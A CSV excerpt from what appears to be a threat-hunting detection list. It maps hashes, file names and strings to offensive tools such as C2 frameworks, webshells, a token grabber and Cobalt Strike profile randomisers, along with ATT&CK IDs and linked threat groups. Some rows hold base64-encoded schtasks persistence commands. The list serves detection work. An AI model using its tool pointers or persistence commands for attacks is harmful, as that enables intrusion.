"*c2a640190d6567ec2b613cb2f3a37496a4df5450c577e4326b13457f69ba7160*",".{0,1000}c2a640190d6567ec2b613cb2f3a37496a4df5450c577e4326b13457f69ba7160.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","36822"
"*C2ACD3667483E5AC1E423E482DBA462E96DA3978776BFED07D9B436FEE135AB2*",".{0,1000}C2ACD3667483E5AC1E423E482DBA462E96DA3978776BFED07D9B436FEE135AB2.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#filehash","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","36823"
"*c2be7dd40f08c1696c4971e9adb2ffa6b5d8565199aedd952c5e7238e1ad08f3*",".{0,1000}c2be7dd40f08c1696c4971e9adb2ffa6b5d8565199aedd952c5e7238e1ad08f3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36825"
"*c2c3bd47f27bb46be73e9ac8aff49dc36d6baea77ac7998d3668aef1b4893f85*",".{0,1000}c2c3bd47f27bb46be73e9ac8aff49dc36d6baea77ac7998d3668aef1b4893f85.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","36826"
"*c2c9d4ca6ba2ca502be8d0a9670f7e8a5f7ab0bf315690b1c9df7b53ccf9c5cd*",".{0,1000}c2c9d4ca6ba2ca502be8d0a9670f7e8a5f7ab0bf315690b1c9df7b53ccf9c5cd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36827"
"*c2cf51bf8a314ce15a028b75bb2b29f386269608c9bff979acbe9692172ee6ec*",".{0,1000}c2cf51bf8a314ce15a028b75bb2b29f386269608c9bff979acbe9692172ee6ec.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36829"
"*C2concealer -*",".{0,1000}C2concealer\s\-.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","N/A","10","10","1053","172","2024-06-25T11:10:54Z","2020-03-23T14:13:16Z","36830"
"*C2concealer-master*",".{0,1000}C2concealer\-master.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","N/A","10","10","1053","172","2024-06-25T11:10:54Z","2020-03-23T14:13:16Z","36831"
"*c2d02d102fc5d471aae2cf7448c9a5d5f9b9ae7a0138b1c78ae122a47fd25142*",".{0,1000}c2d02d102fc5d471aae2cf7448c9a5d5f9b9ae7a0138b1c78ae122a47fd25142.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","36832"
"*C2DAC5B0DBA2FC51AAA3FAF6AA1372E43D7A2B33F288FCEC5ADD4B7360440DBA*",".{0,1000}C2DAC5B0DBA2FC51AAA3FAF6AA1372E43D7A2B33F288FCEC5ADD4B7360440DBA.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","36833"
"*c2db7182d606ef3d00a40360e62f16a47aea5d39872bb5bab4b115d4da864394*",".{0,1000}c2db7182d606ef3d00a40360e62f16a47aea5d39872bb5bab4b115d4da864394.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","36834"
"*c2dc48ba4a9ef1c03de0fe5d6df430df3a2d61792d2220d321702adcdc582162*",".{0,1000}c2dc48ba4a9ef1c03de0fe5d6df430df3a2d61792d2220d321702adcdc582162.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","36835"
"*'C2Default'*",".{0,1000}\'C2Default\'.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","36836"
"*c2e755a58685ea4f356c897fdc0c9420579f6eae48ac6f27307e8a8b73500cb6*",".{0,1000}c2e755a58685ea4f356c897fdc0c9420579f6eae48ac6f27307e8a8b73500cb6.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","36838"
"*c2endpoint.php*",".{0,1000}c2endpoint\.php.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","36840"
"*C2F24BBD-4807-49F5-B5E2-77FF0E8B756B*",".{0,1000}C2F24BBD\-4807\-49F5\-B5E2\-77FF0E8B756B.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#GUIDproject","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","36842"
"*c2fc425c6790459d69b7511d6b7626d4f140442c65a7751d69541ceab1bc47bd*",".{0,1000}c2fc425c6790459d69b7511d6b7626d4f140442c65a7751d69541ceab1bc47bd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36843"
"*C2FunctionAgent*",".{0,1000}C2FunctionAgent.{0,1000}","offensive_tool_keyword","ServerlessRedirector","Serverless Redirector in various cloud vendor for red team","T1090.003 - T1095 - T1001.003","TA0010 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/KINGSABRI/ServerlessRedirector","1","0","#useragent","N/A","10","1","72","10","2022-12-08T08:56:02Z","2022-12-08T07:52:49Z","36844"
"*c2hlbGxjb2Rl*",".{0,1000}c2hlbGxjb2Rl.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","36845"
"*c2lint *",".{0,1000}c2lint\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","36846"
"*C2ListenerPort*",".{0,1000}C2ListenerPort.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","36847"
"*c2-logs.txt*",".{0,1000}c2\-logs\.txt.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","36848"
"*c2NodGFza3MgL2NyZWF0ZSAvdG4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC90ciAid3NjcmlwdCAlQVBQREFUQSVcV2luZG93czp3aW5ybS52YnMiIC9zYyBEQUlMWQ*",".{0,1000}c2NodGFza3MgL2NyZWF0ZSAvdG4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC90ciAid3NjcmlwdCAlQVBQREFUQSVcV2luZG93czp3aW5ybS52YnMiIC9zYyBEQUlMWQ.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","36849"
"*c2NodGFza3MgL2NyZWF0ZSAvdG4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC90ciAid3NjcmlwdCAlQVBQREFUQSVcV2luZG93czp3aW5ybS52YnMiIC9zYyBPTlNUQVJUIC9ydSBzeXN0ZW0*",".{0,1000}c2NodGFza3MgL2NyZWF0ZSAvdG4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC90ciAid3NjcmlwdCAlQVBQREFUQSVcV2luZG93czp3aW5ybS52YnMiIC9zYyBPTlNUQVJUIC9ydSBzeXN0ZW0.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","36850"
"*c2NodGFza3MgL2RlbGV0ZSAvVE4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC9m*",".{0,1000}c2NodGFza3MgL2RlbGV0ZSAvVE4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC9m.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","36851"
"*c2profile.profile*",".{0,1000}c2profile\.profile.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","36852"
"*C2ProfileManager.*",".{0,1000}C2ProfileManager\..{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","36853"
"*C2ProfileResponse.cs*",".{0,1000}C2ProfileResponse\.cs.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","36854"
"*-c2-randomizer.py*",".{0,1000}\-c2\-randomizer\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","36855"
"*C2ReverseClint*",".{0,1000}C2ReverseClint.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","36856"
"*C2ReverseProxy*",".{0,1000}C2ReverseProxy.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","36857"
"*C2ReverseServer*",".{0,1000}C2ReverseServer.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","36858"
"*C2script/proxy.*",".{0,1000}C2script\/proxy\..{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","36859"
